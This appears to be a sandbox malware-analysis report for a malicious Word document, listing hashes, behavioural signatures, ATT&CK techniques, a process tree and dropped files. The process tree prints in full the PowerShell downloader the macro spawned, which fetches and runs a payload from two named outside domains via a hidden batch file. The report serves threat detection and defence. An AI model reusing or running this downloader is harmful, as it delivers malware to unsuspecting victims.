3ac85313fd21ee48cd20576d116fb1961fd30f6aef692c50c6a041417be7da73

General

Target

3ac85313fd21ee48cd20576d116fb1961fd30f6aef692c50c6a041417be7da73.doc
Size

78KB
MD5

8d2ff5302b1a00e27fc74a4a0e7d691e
SHA1

c31d9dabf66ca0bcf3d18e530bd8c659451f6867
SHA256

3ac85313fd21ee48cd20576d116fb1961fd30f6aef692c50c6a041417be7da73
SHA512

3021215fea7224c5fe15a7838c9353c6745bc3f0729ff8df46b77d9aa7a002214280a6056ce6bf43a0248d0bbda5a1d7a3c54e4b38ace76b52161a09ae94262f
SSDEEP

1536:fvCIgb6Evkehxknn1N9AQTZZNcXlCqe8K6NV:fvCI87vhyn1NnTZZNmCqTN

Score

10^/10

Malware Config

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process	4520	1676	cmd.exe	WINWORD.EXE

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

63 3884 powershell.exe
65 3884 powershell.exe

flow	pid	process
63	3884	powershell.exe
65	3884	powershell.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

1676 WINWORD.EXE
1676 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exe

pid process

2088 powershell.exe
2088 powershell.exe
3884 powershell.exe
3884 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2088 powershell.exe
Token: SeDebugPrivilege 3884 powershell.exe
Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

WINWORD.EXE

pid process

1676 WINWORD.EXE
1676 WINWORD.EXE
Suspicious use of SetWindowsHookEx 8 IoCs

Processes:

WINWORD.EXE

pid process

1676 WINWORD.EXE
1676 WINWORD.EXE
1676 WINWORD.EXE
1676 WINWORD.EXE
1676 WINWORD.EXE
1676 WINWORD.EXE
1676 WINWORD.EXE
1676 WINWORD.EXE

pid	process
1676	WINWORD.EXE
1676	WINWORD.EXE

pid	process
2088	powershell.exe
2088	powershell.exe
3884	powershell.exe
3884	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2088	powershell.exe
Token: SeDebugPrivilege	3884	powershell.exe

pid	process
1676	WINWORD.EXE
1676	WINWORD.EXE

pid	process
1676	WINWORD.EXE
1676	WINWORD.EXE
1676	WINWORD.EXE
1676	WINWORD.EXE
1676	WINWORD.EXE
1676	WINWORD.EXE
1676	WINWORD.EXE
1676	WINWORD.EXE

Suspicious use of WriteProcessMemory 10 IoCs

Processes:

WINWORD.EXEcmd.exepowershell.execmd.exe

description	pid	process	target process
PID 1676 wrote to memory of 2860	1676	WINWORD.EXE	splwow64.exe
PID 1676 wrote to memory of 2860	1676	WINWORD.EXE	splwow64.exe
PID 1676 wrote to memory of 4520	1676	WINWORD.EXE	cmd.exe
PID 1676 wrote to memory of 4520	1676	WINWORD.EXE	cmd.exe
PID 4520 wrote to memory of 2088	4520	cmd.exe	powershell.exe
PID 4520 wrote to memory of 2088	4520	cmd.exe	powershell.exe
PID 2088 wrote to memory of 4552	2088	powershell.exe	cmd.exe
PID 2088 wrote to memory of 4552	2088	powershell.exe	cmd.exe
PID 4552 wrote to memory of 3884	4552	cmd.exe	powershell.exe
PID 4552 wrote to memory of 3884	4552	cmd.exe	powershell.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\3ac85313fd21ee48cd20576d116fb1961fd30f6aef692c50c6a041417be7da73.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1676

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:2860

C:\Windows\SYSTEM32\cmd.exe
cmd /c powershell "'powershell ""function tvcv([string] $vpyyugvh){(new-object system.net.webclient).downloadfile($vpyyugvh,''%tmp%\bdvtso.exe'');start-process ''%tmp%\bdvtso.exe'';}try{tvcv(''http://electrofluxequipmentspvtltd.com/pl.bin'')}catch{tvcv(''http://goloramltd.com/pl.bin'')}'"" | out-file -encoding ascii -filepath %tmp%\dmmawike.bat; start-process '%tmp%\dmmawike.bat' -windowstyle hidden"
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4520

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "'powershell ""function tvcv([string] $vpyyugvh){(new-object system.net.webclient).downloadfile($vpyyugvh,''C:\Users\Admin\AppData\Local\Temp\bdvtso.exe'');start-process ''C:\Users\Admin\AppData\Local\Temp\bdvtso.exe'';}try{tvcv(''http://electrofluxequipmentspvtltd.com/pl.bin'')}catch{tvcv(''http://goloramltd.com/pl.bin'')}'"" | out-file -encoding ascii -filepath C:\Users\Admin\AppData\Local\Temp\dmmawike.bat; start-process 'C:\Users\Admin\AppData\Local\Temp\dmmawike.bat' -windowstyle hidden"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2088

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dmmawike.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:4552

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "function tvcv([string] $vpyyugvh){(new-object system.net.webclient).downloadfile($vpyyugvh,'C:\Users\Admin\AppData\Local\Temp\bdvtso.exe');start-process 'C:\Users\Admin\AppData\Local\Temp\bdvtso.exe';}try{tvcv('http://electrofluxequipmentspvtltd.com/pl.bin')}catch{tvcv('http://goloramltd.com/pl.bin')}
5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3884

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
70595b5937369a2592a524db67e208d3

SHA1
d989b934d9388104189f365694e794835aa6f52f

SHA256
be09b93a020e2e86a0b3c7c3f3d3e2c45f888944b1036df738385ede16f595c8

SHA512
edb412886187a2740eb7e284b16838bdd9f011aba1f4581f1fed25a86cdfe9b2ab4df863edeb3db6b072805439d57b10f3e0a1f2daabe1ee56db275ad2ad61e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\dmmawike.bat
Filesize
316B

MD5
64c3347fc92ba1c4dc7deb5e71e6ef03

SHA1
a3f5dc5f745fc7e29fc623c9f462a4521acbc7c6

SHA256
a5d9b37253770a17e6864658da3c982bc70e0fab7490bc89a1d66fc5e698701c

SHA512
99b9f821be7ac6890cfd8077c32d17887cda60ef0a92bbe65045c0281474f5047838d323a9f9ab4cf1e1496e868c9ae04a2108aa55cc7714f8d328a2af1e9bca

Download Submit
memory/1676-153-0x00007FFA81510000-0x00007FFA81520000-memory.dmp

Filesize
64KB

Download
memory/1676-155-0x00007FFA81510000-0x00007FFA81520000-memory.dmp

Filesize
64KB

Download
memory/1676-137-0x00007FFA7F4B0000-0x00007FFA7F4C0000-memory.dmp

Filesize
64KB

Download
memory/1676-138-0x00007FFA7F4B0000-0x00007FFA7F4C0000-memory.dmp

Filesize
64KB

Download
memory/1676-152-0x00007FFA81510000-0x00007FFA81520000-memory.dmp

Filesize
64KB

Download
memory/1676-141-0x00000289D32D0000-0x00000289D32D4000-memory.dmp

Filesize
16KB

Download
memory/1676-132-0x00007FFA81510000-0x00007FFA81520000-memory.dmp

Filesize
64KB

Download
memory/1676-133-0x00007FFA81510000-0x00007FFA81520000-memory.dmp

Filesize
64KB

Download
memory/1676-134-0x00007FFA81510000-0x00007FFA81520000-memory.dmp

Filesize
64KB

Download
memory/1676-136-0x00007FFA81510000-0x00007FFA81520000-memory.dmp

Filesize
64KB

Download
memory/1676-135-0x00007FFA81510000-0x00007FFA81520000-memory.dmp

Filesize
64KB

Download
memory/1676-154-0x00007FFA81510000-0x00007FFA81520000-memory.dmp

Filesize
64KB

Download
memory/2088-146-0x00007FFA95F00000-0x00007FFA969C1000-memory.dmp

Filesize
10.8MB

Download
memory/2088-143-0x000001537A3F0000-0x000001537A412000-memory.dmp

Filesize
136KB

Download
memory/2088-142-0x0000000000000000-mapping.dmp

Download
memory/2088-156-0x00007FFA95F00000-0x00007FFA969C1000-memory.dmp

Filesize
10.8MB

Download
memory/2860-139-0x0000000000000000-mapping.dmp

Download
memory/3884-151-0x00007FFA95F00000-0x00007FFA969C1000-memory.dmp

Filesize
10.8MB

Download
memory/3884-147-0x0000000000000000-mapping.dmp

Download
memory/3884-157-0x00007FFA95F00000-0x00007FFA969C1000-memory.dmp

Filesize
10.8MB

Download
memory/3884-158-0x00007FFA95F00000-0x00007FFA969C1000-memory.dmp

Filesize
10.8MB

Download
memory/4520-140-0x0000000000000000-mapping.dmp

Download
memory/4552-144-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads